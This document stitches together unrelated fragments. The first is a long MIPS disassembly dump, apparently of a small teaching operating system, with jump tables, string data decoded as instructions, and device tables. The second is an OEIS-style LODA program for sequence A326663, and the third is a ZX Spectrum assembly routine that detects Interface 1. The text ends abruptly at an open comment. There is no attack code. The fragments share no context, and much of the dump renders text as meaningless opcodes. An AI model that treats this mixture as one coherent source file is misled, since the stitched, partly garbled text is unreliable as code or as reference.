4070cc: 00400828 0x400828
4070d0: 00400828 0x400828
4070d4: 00400828 0x400828
4070d8: 00400828 0x400828
4070dc: 00400828 0x400828
4070e0: 00400828 0x400828
4070e4: 00400828 0x400828
4070e8: 00400828 0x400828
4070ec: 00400828 0x400828
4070f0: 00400828 0x400828
4070f4: 00400828 0x400828
4070f8: 00400828 0x400828
4070fc: 00400828 0x400828
407100: 00400828 0x400828
407104: 00400828 0x400828
407108: 00400828 0x400828
40710c: 00400828 0x400828
407110: 00400828 0x400828
407114: 00400828 0x400828
407118: 00400828 0x400828
40711c: 00400828 0x400828
407120: 00400828 0x400828
407124: 00400828 0x400828
407128: 00400828 0x400828
40712c: 00400828 0x400828
407130: 00400828 0x400828
407134: 0040050c syscall 0x10014
407138: 00400828 0x400828
40713c: 00400828 0x400828
407140: 00400828 0x400828
407144: 00400828 0x400828
407148: 00400828 0x400828
40714c: 00400828 0x400828
407150: 00400828 0x400828
407154: 00400828 0x400828
407158: 00400828 0x400828
40715c: 00400828 0x400828
407160: 00400594 0x400594
407164: 00400828 0x400828
407168: 00400828 0x400828
40716c: 00400828 0x400828
407170: 00400828 0x400828
407174: 00400828 0x400828
407178: 0040060c syscall 0x10018
40717c: 00400828 0x400828
407180: 00400828 0x400828
407184: 004006fc 0x4006fc
407188: 00400828 0x400828
40718c: 00400828 0x400828
407190: 00400828 0x400828
407194: 00400828 0x400828
407198: 00400828 0x400828
40719c: 00400828 0x400828
4071a0: 00400828 0x400828
4071a4: 00400828 0x400828
4071a8: 00400828 0x400828
4071ac: 00400494 0x400494
4071b0: 00400778 0x400778
4071b4: 0040050c syscall 0x10014
4071b8: 00400828 0x400828
4071bc: 00400828 0x400828
4071c0: 00400828 0x400828
4071c4: 00400828 0x400828
4071c8: 00400828 0x400828
4071cc: 00400828 0x400828
4071d0: 00400828 0x400828
4071d4: 00400828 0x400828
4071d8: 00400828 0x400828
4071dc: 00400828 0x400828
4071e0: 00400594 0x400594
4071e4: 00400828 0x400828
4071e8: 00400828 0x400828
4071ec: 00400828 0x400828
4071f0: 004007cc syscall 0x1001f
4071f4: 00400828 0x400828
4071f8: 0040060c syscall 0x10018
4071fc: 00400828 0x400828
407200: 00400828 0x400828
407204: 00400684 0x400684
...
407210: 09097468 j 425d1a0 <end+0x3e55198>
407214: 69732069 0x69732069
407218: 73206368 0x73206368
40721c: 696c6432 0x696c6432
407220: 203a613a addi k0,at,24890
407224: 25640a00 addiu a0,t3,2560
407228: 09746869 j 5d1a1a4 <end+0x591219c>
40722c: 73206973 0x73206973
407230: 20636869 addi v1,v1,26729
407234: 6c64203a 0x6c64203a
407238: 613a2564 0x613a2564
40723c: 0a000000 j 8000000 <end+0x7bf7ff8>
407240: 74686973 jalx 1a1a5cc <end+0x16125c4>
407244: 20697320 addi t1,v1,29472
407248: 66617468 0x66617468
40724c: 65723a20 0x65723a20
407250: 613a2564 0x613a2564
407254: 0a000000 j 8000000 <end+0x7bf7ff8>
407258: 70616e69 0x70616e69
40725c: 63206174 0x63206174
407260: 2025733a addi a1,at,29498
407264: 25643a20 addiu a0,t3,14880
407268: 00000000 nop
40726c: 666f726b 0x666f726b
407270: 2e630000 sltiu v1,s3,0
407274: 55736572 0x55736572
407278: 20706766 addi s0,v1,26470
40727c: 61756c74 0x61756c74
407280: 20686164 addi t0,v1,24932
407284: 646c6572 0x646c6572
407288: 20666163 addi a2,v1,24931
40728c: 696e6720 0x696e6720
407290: 61206e6f 0x61206e6f
407294: 6e2d434f 0x6e2d434f
407298: 57207061 0x57207061
40729c: 67650a00 0x67650a00
4072a0: 55736572 0x55736572
4072a4: 20706766 addi s0,v1,26470
4072a8: 61756c74 0x61756c74
4072ac: 20686164 addi t0,v1,24932
4072b0: 646c6572 0x646c6572
4072b4: 206d656d addi t5,v1,25965
4072b8: 5f616c6c 0x5f616c6c
4072bc: 6f632066 0x6f632066
4072c0: 61696c64 0x61696c64
4072c4: 0a000000 j 8000000 <end+0x7bf7ff8>
4072c8: 55736572 0x55736572
4072cc: 20706766 addi s0,v1,26470
4072d0: 61756c74 0x61756c74
4072d4: 20686164 addi t0,v1,24932
4072d8: 646c6572 0x646c6572
4072dc: 206d656d addi t5,v1,25965
4072e0: 5f6d6170 0x5f6d6170
4072e4: 20666169 addi a2,v1,24937
4072e8: 6c640a00 0x6c640a00
4072ec: 55736572 0x55736572
4072f0: 20706766 addi s0,v1,26470
4072f4: 61756c74 0x61756c74
4072f8: 20686164 addi t0,v1,24932
4072fc: 646c6572 0x646c6572
407300: 206d656d addi t5,v1,25965
407304: 5f756e6d 0x5f756e6d
407308: 61702066 0x61702066
40730c: 61696c65 0x61696c65
407310: 640a0000 0x640a0000
407314: 6661696c 0x6661696c
407318: 65642074 0x65642074
40731c: 6f206475 0x6f206475
407320: 70207265 0x70207265
407324: 61642d6f 0x61642d6f
407328: 6e6c7920 0x6e6c7920
40732c: 5054450a 0x5054450a
407330: 00000000 nop
407334: 6661696c 0x6661696c
407338: 65642074 0x65642074
40733c: 6f206475 0x6f206475
407340: 70204c49 0x70204c49
407344: 42415241 c0 0x415241
407348: 59205054 0x59205054
40734c: 450a0000 0x450a0000
407350: 6661696c 0x6661696c
407354: 65642074 0x65642074
407358: 6f206475 0x6f206475
40735c: 70205054 0x70205054
407360: 45207768 0x45207768
407364: 69636820 0x69636820
407368: 68617320 0x68617320
40736c: 6265656e 0x6265656e
407370: 20647570 addi a0,v1,30064
407374: 6c696361 0x6c696361
407378: 74656420 jalx 1959080 <end+0x1551078>
40737c: 6265666f 0x6265666f
407380: 72650a00 0x72650a00
407384: 6661696c 0x6661696c
407388: 65642074 0x65642074
40738c: 6f206475 0x6f206475
407390: 70205054 0x70205054
407394: 45207769 0x45207769
407398: 74682043 jalx 1a0810c <end+0x1600104>
40739c: 4f572069 c3 0x1572069
4073a0: 6e206368 0x6e206368
4073a4: 696c6420 0x696c6420
4073a8: 656e760a 0x656e760a
4073ac: 00000000 nop
4073b0: 6661696c 0x6661696c
4073b4: 65642074 0x65642074
4073b8: 6f206475 0x6f206475
4073bc: 70205054 0x70205054
4073c0: 45207769 0x45207769
4073c4: 74682043 jalx 1a0810c <end+0x1600104>
4073c8: 4f572069 c3 0x1572069
4073cc: 6e206661 0x6e206661
4073d0: 74686572 jalx 1a195c8 <end+0x16115c0>
4073d4: 20656e76 addi a1,v1,28278
4073d8: 0a000000 j 8000000 <end+0x7bf7ff8>
4073dc: 666f726b 0x666f726b
4073e0: 20616c6c addi at,v1,27756
4073e4: 6f63206d 0x6f63206d
4073e8: 656d2066 0x656d2066
4073ec: 61696c65 0x61696c65
4073f0: 640a0000 0x640a0000
4073f4: 666f726b 0x666f726b
4073f8: 20736574 addi s3,v1,25972
4073fc: 20706766 addi s0,v1,26470
407400: 61756c74 0x61756c74
407404: 5f68616e 0x5f68616e
407408: 646c6572 0x646c6572
40740c: 20666169 addi a2,v1,24937
407410: 6c65640a 0x6c65640a
407414: 00000000 nop
407418: 666f726b 0x666f726b
40741c: 20736574 addi s3,v1,25972
407420: 20737461 addi s3,v1,29793
407424: 74757320 jalx 1d5cc80 <end+0x1954c78>
407428: 6661696c 0x6661696c
40742c: 65640a00 0x65640a00
407430: 73666f72 0x73666f72
407434: 6b206e6f 0x6b206e6f
407438: 7420696d jalx 81a5b4 <end+0x4125ac>
40743c: 706c656d 0x706c656d
407440: 656e7465 0x656e7465
407444: 64000000 0x64000000
407448: 63616e6e 0x63616e6e
40744c: 6f742073 0x6f742073
407450: 65742070 0x65742070
407454: 67666175 0x67666175
407458: 6c742068 0x6c742068
40745c: 616e646c 0x616e646c
407460: 65720a00 0x65720a00
407464: 6970632e 0x6970632e
407468: 63000000 0x63000000
40746c: 6572726f 0x6572726f
407470: 7220696e 0x7220696e
407474: 20697063 addi t1,v1,28771
407478: 5f73656e 0x5f73656e
40747c: 643a2025 0x643a2025
407480: 64000000 0x64000000
407484: 5b253038 0x5b253038
407488: 785d2075 0x785d2075
40748c: 6e6b6e6f 0x6e6b6e6f
407490: 776e2064 jalx db88190 <end+0xd780188>
407494: 65766963 0x65766963
407498: 65207479 0x65207479
40749c: 70652025 0x70652025
4074a0: 640a0000 0x640a0000
4074a4: 5b253038 0x5b253038
4074a8: 785d2072 0x785d2072
4074ac: 65616420 0x65616420
4074b0: 2564202d addiu a0,t3,8237
4074b4: 2d206261 sltiu zero,t1,25185
4074b8: 64206d6f 0x64206d6f
4074bc: 64650a00 0x64650a00
4074c0: 5b253038 0x5b253038
4074c4: 785d2077 0x785d2077
4074c8: 72697465 0x72697465
4074cc: 20256420 addi a1,at,25632
4074d0: 2d2d2062 sltiu t5,t1,8290
4074d4: 6164206d 0x6164206d
4074d8: 6f64650a 0x6f64650a
4074dc: 00000000 nop
4074e0: 66696c65 0x66696c65
4074e4: 00000000 nop
4074e8: 57697468 0x57697468
4074ec: 6f757420 0x6f757420
4074f0: 66726565 0x66726565
4074f4: 20666420 addi a2,v1,25632
4074f8: 6c656674 0x6c656674
4074fc: 0a000000 j 8000000 <end+0x7bf7ff8>
407500: 63616e6e 0x63616e6e
407504: 6f6e7420 0x6f6e7420
407508: 6f70656e 0x6f70656e
40750c: 2066696c addi a2,v1,26988
407510: 65202573 0x65202573
407514: 0a000000 j 8000000 <end+0x7bf7ff8>
407518: 63616e6e 0x63616e6e
40751c: 6f74206d 0x6f74206d
407520: 61702074 0x61702074
407524: 68652066 0x68652066
407528: 696c652e 0x696c652e
40752c: 0a000000 j 8000000 <end+0x7bf7ff8>
407530: 63616e6e 0x63616e6e
407534: 6f742063 0x6f742063
407538: 6c6f7365 0x6c6f7365
40753c: 20746865 addi s4,v1,26725
407540: 2066696c addi a2,v1,26988
407544: 650a0000 0x650a0000
407548: 63616e6e 0x63616e6e
40754c: 6f6e7420 0x6f6e7420
407550: 756e6d61 jalx 5b9b584 <end+0x579357c>
407554: 70207468 0x70207468
407558: 65206669 0x65206669
40755c: 6c652e0a 0x6c652e0a
407560: 00000000 nop
407564: 66696c65 0x66696c65
407568: 2e630000 sltiu v1,s3,0
40756c: 66747275 0x66747275
407570: 6e636174 0x6e636174
407574: 653a2073 0x653a2073
407578: 79736361 0x79736361
40757c: 6c6c5f6d 0x6c6c5f6d
407580: 656d5f75 0x656d5f75
407584: 6e6d6170 0x6e6d6170
407588: 20253038 addi a1,at,12344
40758c: 783a2025 0x783a2025
407590: 65000000 0x65000000
407594: 70697065 0x70697065
407598: 00000000 nop
40759c: 5b253038 0x5b253038
4075a0: 785d2070 0x785d2070
4075a4: 69706563 0x69706563
4075a8: 72656174 0x72656174
4075ac: 65200a00 0x65200a00
4075b0: 3c706970 0x3c706970
4075b4: 653e0000 0x653e0000
4075b8: 66736970 0x66736970
4075bc: 632e6300 0x632e6300
4075c0: 66736970 0x66736970
4075c4: 635f6d61 0x635f6d61
4075c8: 703a2075 0x703a2075
4075cc: 6e657870 0x6e657870
4075d0: 65637465 0x65637465
4075d4: 64207065 0x64207065
4075d8: 726d6973 0x726d6973
4075dc: 73696f6e 0x73696f6e
4075e0: 73202530 0x73202530
4075e4: 38782066 xori t8,v1,0x2066
4075e8: 6f722064 0x6f722064
4075ec: 73747661 0x73747661
4075f0: 20253038 addi a1,at,12344
4075f4: 78000000 0x78000000
4075f8: 636f6e73 0x636f6e73
4075fc: 00000000 nop
407600: 25630000 addiu v1,t3,0
407604: 25730000 addiu s3,t3,0
407608: 3c636f6e 0x3c636f6e
40760c: Address 0x000000000040760c is out of bounds.
Disassembly of section .data.rel:
00407610 <devtab>:
407610: 00407620 0x407620
407614: 00407658 0x407658
407618: 0040763c 0x40763c
40761c: 00000000 nop
Disassembly of section .data.rel.local:
00407620 <devfile>:
407620: 00000066 0x66
407624: 004074e0 0x4074e0
407628: 00402478 0x402478
40762c: 004025d4 0x4025d4
407630: 004023a0 0x4023a0
407634: 00402684 0x402684
407638: 00000000 nop
0040763c <devpipe>:
40763c: 00000070 0x70
407640: 00407594 0x407594
407644: 00402aa0 0x402aa0
407648: 00402aa8 0x402aa8
40764c: 00402b18 0x402b18
407650: 00402ab0 0x402ab0
407654: 00000000 nop
00407658 <devcons>:
407658: 00000063 0x63
40765c: 004075f8 0x4075f8
407660: 00402ea0 0x402ea0
407664: 00402f48 0x402f48
407668: 00402ff8 0x402ff8
40766c: 00403000 0x403000
407670: 00000000 nop
Disassembly of section .bss:
00408000 <global_a>:
408000: 00000000 nop
00408004 <env>:
408004: 00000000 nop
Disassembly of section .pdr:
00000000 <.pdr>:
0: 004000c0 0x4000c0
...
18: 0000001d 0x1d
1c: 0000001f 0x1f
20: 004000d0 0x4000d0
...
38: 0000001d 0x1d
3c: 0000001f 0x1f
40: 004000e0 0x4000e0
44: 80000000 lb zero,0(zero)
48: fffffff8 0xfffffff8
...
54: 00000018 mult zero,zero
58: 0000001d 0x1d
5c: 0000001f 0x1f
60: 00400180 0x400180
64: 80070000 lb a3,0(zero)
68: fffffffc 0xfffffffc
...
74: 00000020 add zero,zero,zero
78: 0000001d 0x1d
7c: 0000001f 0x1f
80: 00400218 0x400218
84: 80000000 lb zero,0(zero)
88: fffffff8 0xfffffff8
...
94: 00000020 add zero,zero,zero
98: 0000001d 0x1d
9c: 0000001f 0x1f
a0: 00400258 0x400258
a4: 80010000 lb at,0(zero)
a8: fffffffc 0xfffffffc
...
b4: 00000020 add zero,zero,zero
b8: 0000001d 0x1d
bc: 0000001f 0x1f
c0: 004002c0 0x4002c0
c4: 803f0000 lb ra,0(at)
c8: fffffff8 0xfffffff8
...
d4: 00000428 0x428
d8: 0000001d 0x1d
dc: 0000001f 0x1f
e0: 0040088c syscall 0x10022
...
f8: 0000001d 0x1d
fc: 0000001f 0x1f
100: 00400908 0x400908
...
118: 0000001d 0x1d
11c: 0000001f 0x1f
120: 00400a28 0x400a28
...
138: 0000001d 0x1d
13c: 0000001f 0x1f
140: 00400bc0 0x400bc0
144: 80000000 lb zero,0(zero)
148: fffffff8 0xfffffff8
...
154: 00000018 mult zero,zero
158: 0000001d 0x1d
15c: 0000001f 0x1f
160: 00400be0 0x400be0
164: 80070000 lb a3,0(zero)
168: fffffffc 0xfffffffc
...
174: 00000020 add zero,zero,zero
178: 0000001d 0x1d
17c: 0000001f 0x1f
180: 00400c60 0x400c60
184: 80000000 lb zero,0(zero)
188: fffffff8 0xfffffff8
...
194: 00000018 mult zero,zero
198: 0000001d 0x1d
19c: 0000001f 0x1f
1a0: 00400c88 0x400c88
...
1b8: 0000001d 0x1d
1bc: 0000001f 0x1f
1c0: 00400d10 0x400d10
...
1d8: 0000001d 0x1d
1dc: 0000001f 0x1f
1e0: 00400d3c 0x400d3c
1e4: 80030000 lb v1,0(zero)
1e8: fffffff8 0xfffffff8
...
1f4: 00000028 0x28
1f8: 0000001d 0x1d
1fc: 0000001f 0x1f
200: 00400e50 0x400e50
204: 80030000 lb v1,0(zero)
208: fffffff8 0xfffffff8
...
214: 00000028 0x28
218: 0000001d 0x1d
21c: 0000001f 0x1f
220: 00400fa8 0x400fa8
224: 801f0000 lb ra,0(zero)
228: fffffffc 0xfffffffc
...
234: 00000030 0x30
238: 0000001d 0x1d
23c: 0000001f 0x1f
240: 0040114c syscall 0x10045
244: 800f0000 lb t7,0(zero)
248: fffffff8 0xfffffff8
...
254: 00000030 0x30
258: 0000001d 0x1d
25c: 0000001f 0x1f
260: 00401210 0x401210
264: 803f0000 lb ra,0(at)
268: fffffff8 0xfffffff8
...
274: 00000038 0x38
278: 0000001d 0x1d
27c: 0000001f 0x1f
280: 00401410 0x401410
284: 80000000 lb zero,0(zero)
288: fffffff8 0xfffffff8
...
294: 00000018 mult zero,zero
298: 0000001d 0x1d
29c: 0000001f 0x1f
2a0: 00401430 0x401430
2a4: 80010000 lb at,0(zero)
2a8: fffffffc 0xfffffffc
...
2b4: 00000018 mult zero,zero
2b8: 0000001d 0x1d
2bc: 0000001f 0x1f
2c0: 004014b0 0x4014b0
2c4: 80000000 lb zero,0(zero)
2c8: fffffff8 0xfffffff8
...
2d4: 00000020 add zero,zero,zero
2d8: 0000001d 0x1d
2dc: 0000001f 0x1f
2e0: 004014e8 0x4014e8
2e4: 80000000 lb zero,0(zero)
2e8: fffffff8 0xfffffff8
...
2f4: 00000020 add zero,zero,zero
2f8: 0000001d 0x1d
2fc: 0000001f 0x1f
300: 0040151c 0x40151c
304: 80000000 lb zero,0(zero)
308: fffffff8 0xfffffff8
...
314: 00000020 add zero,zero,zero
318: 0000001d 0x1d
31c: 0000001f 0x1f
320: 00401550 0x401550
324: 80000000 lb zero,0(zero)
328: fffffff8 0xfffffff8
...
334: 00000020 add zero,zero,zero
338: 0000001d 0x1d
33c: 0000001f 0x1f
340: 00401584 0x401584
344: 80000000 lb zero,0(zero)
348: fffffff8 0xfffffff8
...
354: 00000020 add zero,zero,zero
358: 0000001d 0x1d
35c: 0000001f 0x1f
360: 004015c0 0x4015c0
364: 80000000 lb zero,0(zero)
368: fffffff8 0xfffffff8
...
374: 00000020 add zero,zero,zero
378: 0000001d 0x1d
37c: 0000001f 0x1f
380: 004015fc 0x4015fc
384: 80000000 lb zero,0(zero)
388: fffffff8 0xfffffff8
...
394: 00000020 add zero,zero,zero
398: 0000001d 0x1d
39c: 0000001f 0x1f
3a0: 00401644 0x401644
3a4: 80000000 lb zero,0(zero)
3a8: fffffff8 0xfffffff8
...
3b4: 00000020 add zero,zero,zero
3b8: 0000001d 0x1d
3bc: 0000001f 0x1f
3c0: 0040167c 0x40167c
3c4: 80000000 lb zero,0(zero)
3c8: fffffff8 0xfffffff8
...
3d4: 00000020 add zero,zero,zero
3d8: 0000001d 0x1d
3dc: 0000001f 0x1f
3e0: 004016b4 0x4016b4
3e4: 80000000 lb zero,0(zero)
3e8: fffffff8 0xfffffff8
...
3f4: 00000020 add zero,zero,zero
3f8: 0000001d 0x1d
3fc: 0000001f 0x1f
400: 004016ec 0x4016ec
404: 80000000 lb zero,0(zero)
408: fffffff8 0xfffffff8
...
414: 00000020 add zero,zero,zero
418: 0000001d 0x1d
41c: 0000001f 0x1f
420: 00401720 0x401720
424: 80000000 lb zero,0(zero)
428: fffffff8 0xfffffff8
...
434: 00000020 add zero,zero,zero
438: 0000001d 0x1d
43c: 0000001f 0x1f
440: 00401760 0x401760
444: 80000000 lb zero,0(zero)
448: fffffff8 0xfffffff8
...
454: 00000020 add zero,zero,zero
458: 0000001d 0x1d
45c: 0000001f 0x1f
460: 00401794 0x401794
464: 80000000 lb zero,0(zero)
468: fffffff8 0xfffffff8
...
474: 00000020 add zero,zero,zero
478: 0000001d 0x1d
47c: 0000001f 0x1f
480: 004017d0 0x4017d0
484: 801f0000 lb ra,0(zero)
488: fffffffc 0xfffffffc
...
494: 00000028 0x28
498: 0000001d 0x1d
49c: 0000001f 0x1f
4a0: 00401868 0x401868
4a4: 80030000 lb v1,0(zero)
4a8: fffffff8 0xfffffff8
...
4b4: 00000020 add zero,zero,zero
4b8: 0000001d 0x1d
4bc: 0000001f 0x1f
4c0: 004018f0 0x4018f0
...
4d8: 0000001d 0x1d
4dc: 0000001f 0x1f
4e0: 0040191c 0x40191c
...
4f8: 0000001d 0x1d
4fc: 0000001f 0x1f
500: 00401940 0x401940
...
518: 0000001d 0x1d
51c: 0000001f 0x1f
520: 00401994 0x401994
...
538: 0000001d 0x1d
53c: 0000001f 0x1f
540: 004019c8 0x4019c8
...
558: 0000001d 0x1d
55c: 0000001f 0x1f
560: 00401a50 0x401a50
564: 80000000 lb zero,0(zero)
568: fffffff8 0xfffffff8
...
574: 00000018 mult zero,zero
578: 0000001d 0x1d
57c: 0000001f 0x1f
580: 00401af0 0x401af0
...
598: 0000001d 0x1d
59c: 0000001f 0x1f
5a0: 00401b74 0x401b74
5a4: 80000000 lb zero,0(zero)
5a8: fffffff8 0xfffffff8
...
5b4: 00000018 mult zero,zero
5b8: 0000001d 0x1d
5bc: 0000001f 0x1f
5c0: 00401b98 0x401b98
...
5d8: 0000001d 0x1d
5dc: 0000001f 0x1f
5e0: 00401be8 0x401be8
5e4: 80000000 lb zero,0(zero)
5e8: fffffff8 0xfffffff8
...
5f4: 00000018 mult zero,zero
5f8: 0000001d 0x1d
5fc: 0000001f 0x1f
600: 00401c14 0x401c14
...
618: 0000001d 0x1d
61c: 0000001f 0x1f
620: 00401c24 0x401c24
...
638: 0000001d 0x1d
63c: 0000001f 0x1f
640: 00401c34 0x401c34
644: 80010000 lb at,0(zero)
648: fffffffc 0xfffffffc
...
654: 00000020 add zero,zero,zero
658: 0000001d 0x1d
65c: 0000001f 0x1f
660: 00401ca4 0x401ca4
664: 80030000 lb v1,0(zero)
668: fffffff8 0xfffffff8
...
674: 00000020 add zero,zero,zero
678: 0000001d 0x1d
67c: 0000001f 0x1f
680: 00401ce4 0x401ce4
684: 80ff0000 lb ra,0(a3)
688: fffffff8 0xfffffff8
...
694: 00000048 0x48
698: 0000001d 0x1d
69c: 0000001f 0x1f
6a0: 00401e88 0x401e88
6a4: 80070000 lb a3,0(zero)
6a8: fffffffc 0xfffffffc
...
6b4: 00000028 0x28
6b8: 0000001d 0x1d
6bc: 0000001f 0x1f
6c0: 00401f70 0x401f70
6c4: 800f0000 lb t7,0(zero)
6c8: fffffff8 0xfffffff8
...
6d4: 00000028 0x28
6d8: 0000001d 0x1d
6dc: 0000001f 0x1f
6e0: 00401ff8 0x401ff8
6e4: 80070000 lb a3,0(zero)
6e8: fffffffc 0xfffffffc
...
6f4: 00000028 0x28
6f8: 0000001d 0x1d
6fc: 0000001f 0x1f
700: 004020dc 0x4020dc
704: 80010000 lb at,0(zero)
708: fffffffc 0xfffffffc
...
714: 00000020 add zero,zero,zero
718: 0000001d 0x1d
71c: 0000001f 0x1f
720: 0040211c 0x40211c
724: 80010000 lb at,0(zero)
728: fffffffc 0xfffffffc
...
734: 00000020 add zero,zero,zero
738: 0000001d 0x1d
73c: 0000001f 0x1f
740: 00402190 0x402190
744: 80030000 lb v1,0(zero)
748: fffffff8 0xfffffff8
...
754: 00000020 add zero,zero,zero
758: 0000001d 0x1d
75c: 0000001f 0x1f
760: 004021f0 0x4021f0
...
778: 0000001d 0x1d
77c: 0000001f 0x1f
780: 00402280 0x402280
784: 801f0000 lb ra,0(zero)
788: fffffffc 0xfffffffc
...
794: 00000030 0x30
798: 0000001d 0x1d
79c: 0000001f 0x1f
7a0: 004023a0 0x4023a0
7a4: 800f0000 lb t7,0(zero)
7a8: fffffff8 0xfffffff8
...
7b4: 00000028 0x28
7b8: 0000001d 0x1d
7bc: 0000001f 0x1f
7c0: 00402478 0x402478
7c4: 80070000 lb a3,0(zero)
7c8: fffffffc 0xfffffffc
...
7d4: 00000020 add zero,zero,zero
7d8: 0000001d 0x1d
7dc: 0000001f 0x1f
7e0: 004024f8 0x4024f8
7e4: 80030000 lb v1,0(zero)
7e8: fffffff8 0xfffffff8
...
7f4: 00000028 0x28
7f8: 0000001d 0x1d
7fc: 0000001f 0x1f
800: 004025d4 0x4025d4
804: 801f0000 lb ra,0(zero)
808: fffffffc 0xfffffffc
...
814: 00000028 0x28
818: 0000001d 0x1d
81c: 0000001f 0x1f
820: 00402684 0x402684
824: 80030000 lb v1,0(zero)
828: fffffff8 0xfffffff8
...
834: 00000020 add zero,zero,zero
838: 0000001d 0x1d
83c: 0000001f 0x1f
840: 004026e0 0x4026e0
844: c0ff0000 lwc0 $31,0(a3)
848: fffffffc 0xfffffffc
...
854: 00000048 0x48
858: 0000001d 0x1d
85c: 0000001f 0x1f
860: 00402878 0x402878
864: 80000000 lb zero,0(zero)
868: fffffff8 0xfffffff8
...
874: 00000018 mult zero,zero
878: 0000001d 0x1d
87c: 0000001f 0x1f
880: 00402898 0x402898
884: 80000000 lb zero,0(zero)
888: fffffff8 0xfffffff8
...
894: 00000018 mult zero,zero
898: 0000001d 0x1d
89c: 0000001f 0x1f
8a0: 004028c0 0x4028c0
8a4: 80070000 lb a3,0(zero)
8a8: fffffffc 0xfffffffc
...
8b4: 00000030 0x30
8b8: 0000001d 0x1d
8bc: 0000001f 0x1f
8c0: 00402a58 0x402a58
...
8d8: 0000001d 0x1d
8dc: 0000001f 0x1f
8e0: 00402a60 0x402a60
8e4: 80000000 lb zero,0(zero)
8e8: fffffff8 0xfffffff8
...
8f4: 00000020 add zero,zero,zero
8f8: 0000001d 0x1d
8fc: 0000001f 0x1f
900: 00402aa0 0x402aa0
...
918: 0000001d 0x1d
91c: 0000001f 0x1f
920: 00402aa8 0x402aa8
...
938: 0000001d 0x1d
93c: 0000001f 0x1f
940: 00402ab0 0x402ab0
944: 80030000 lb v1,0(zero)
948: fffffff8 0xfffffff8
...
954: 00000020 add zero,zero,zero
958: 0000001d 0x1d
95c: 0000001f 0x1f
960: 00402b18 0x402b18
964: 80000000 lb zero,0(zero)
968: fffffff8 0xfffffff8
...
974: 00000018 mult zero,zero
978: 0000001d 0x1d
97c: 0000001f 0x1f
980: 00402b50 0x402b50
984: 80030000 lb v1,0(zero)
988: fffffff8 0xfffffff8
...
994: 00000028 0x28
998: 0000001d 0x1d
99c: 0000001f 0x1f
9a0: 00402bb4 0x402bb4
9a4: 800f0000 lb t7,0(zero)
9a8: fffffff8 0xfffffff8
...
9b4: 00000030 0x30
9b8: 0000001d 0x1d
9bc: 0000001f 0x1f
9c0: 00402c30 0x402c30
9c4: 80010000 lb at,0(zero)
9c8: fffffffc 0xfffffffc
...
9d4: 00000028 0x28
9d8: 0000001d 0x1d
9dc: 0000001f 0x1f
9e0: 00402ca8 0x402ca8
9e4: 80000000 lb zero,0(zero)
9e8: fffffff8 0xfffffff8
...
9f4: 00000018 mult zero,zero
9f8: 0000001d 0x1d
9fc: 0000001f 0x1f
a00: 00402ce4 0x402ce4
a04: 80000000 lb zero,0(zero)
a08: fffffff8 0xfffffff8
...
a14: 00000018 mult zero,zero
a18: 0000001d 0x1d
a1c: 0000001f 0x1f
a20: 00402d18 0x402d18
a24: 80000000 lb zero,0(zero)
a28: fffffff8 0xfffffff8
...
a34: 00000018 mult zero,zero
a38: 0000001d 0x1d
a3c: 0000001f 0x1f
a40: 00402d54 0x402d54
a44: 80030000 lb v1,0(zero)
a48: fffffff8 0xfffffff8
...
a54: 00000020 add zero,zero,zero
a58: 0000001d 0x1d
a5c: 0000001f 0x1f
a60: 00402db4 0x402db4
a64: 80000000 lb zero,0(zero)
a68: fffffff8 0xfffffff8
...
a74: 00000018 mult zero,zero
a78: 0000001d 0x1d
a7c: 0000001f 0x1f
a80: 00402df0 0x402df0
a84: 80000000 lb zero,0(zero)
a88: fffffff8 0xfffffff8
...
a94: 00000020 add zero,zero,zero
a98: 0000001d 0x1d
a9c: 0000001f 0x1f
aa0: 00402e34 0x402e34
aa4: 80000000 lb zero,0(zero)
aa8: fffffff8 0xfffffff8
...
ab4: 00000020 add zero,zero,zero
ab8: 0000001d 0x1d
abc: 0000001f 0x1f
ac0: 00402ea0 0x402ea0
ac4: 80030000 lb v1,0(zero)
ac8: fffffff8 0xfffffff8
...
ad4: 00000020 add zero,zero,zero
ad8: 0000001d 0x1d
adc: 0000001f 0x1f
ae0: 00402f48 0x402f48
ae4: 803f0000 lb ra,0(at)
ae8: fffffff8 0xfffffff8
...
af4: 000000b0 0xb0
af8: 0000001d 0x1d
afc: 0000001f 0x1f
b00: 00402ff8 0x402ff8
...
b18: 0000001d 0x1d
b1c: 0000001f 0x1f
b20: 00403000 0x403000
b24: 80000000 lb zero,0(zero)
b28: fffffff8 0xfffffff8
...
b34: 00000018 mult zero,zero
b38: 0000001d 0x1d
b3c: 0000001f 0x1f
b40: 00403030 0x403030
...
b58: 0000001d 0x1d
b5c: 0000001f 0x1f
b60: 0040307c 0x40307c
b64: 80030000 lb v1,0(zero)
b68: fffffff8 0xfffffff8
...
b74: 00000228 0x228
b78: 0000001d 0x1d
b7c: 0000001f 0x1f
|
; A326663: Column 3 of the array at A309157; see Comments.
; 5,12,20,26,33,41,47,54,61,68,75,83,89,96,104,110,117,124,131,138,146,152,159,167,173,180,188,194,201,209,215,222,230,236,243,250,257,264,272,278,285,293,299,306,313,320,327,335,341,348,356,362,369,377,383,390,398,404,411,419,425,432,439,446,453,461,467,474,482,488,495,502,509,516,524,530,537,545,551,558,565,572,579,587,593,600,608,614,621,628,635,642,650,656,663,671,677,684,691,698,705,713,719,726,734,740,747,755,761,768,776,782,789,797,803,810,817,824,831,839,845,852,860,866,873,880,887,894,902,908,915,923,929,936,944,950,957,965,971,978,986,992,999,1006,1013,1020,1028,1034,1041,1049,1055,1062,1069,1076,1083,1091,1097,1104,1112,1118,1125,1132,1139,1146,1154,1160,1167,1175,1181,1188,1195,1202,1209,1217,1223,1230,1238,1244,1251,1258,1265,1272,1280,1286,1293,1301,1307,1314,1322,1328,1335,1343,1349,1356,1364,1370,1377,1384,1391,1398,1406,1412,1419,1427,1433,1440,1447,1454,1461,1469,1475,1482,1490,1496,1503,1511,1517,1524,1532,1538,1545,1553,1559,1566,1573,1580,1587,1595,1601,1608,1616,1622,1629,1636,1643,1650,1658,1664,1671,1679,1685,1692,1700,1706,1713,1721,1727,1734,1742,1748
mov $3,$0
add $0,1
gcd $0,19683
lpb $0,1
sub $0,8
lpe
trn $0,2
mov $1,$0
add $1,5
mov $2,$3
mul $2,7
add $1,$2
|
;
; ZX Spectrum specific routines
;
; int if1_installed();
;
; The result is:
; - 0 (false) if the ZX Interface1 is missing or not paged in
; - 1 (true) if the ZX Interface1 is connected and activated.
;
; $Id: if1_installed.asm,v 1.3 2016/06/10 20:02:04 dom Exp $
;
SECTION code_clib
PUBLIC if1_installed
PUBLIC _if1_installed
if1_installed:
_if1_installed:
ld hl,(23635)
ld de,23813
sbc hl,de
ld a,h
or l
ld hl,0
ret nz
inc hl
ret
|
/**
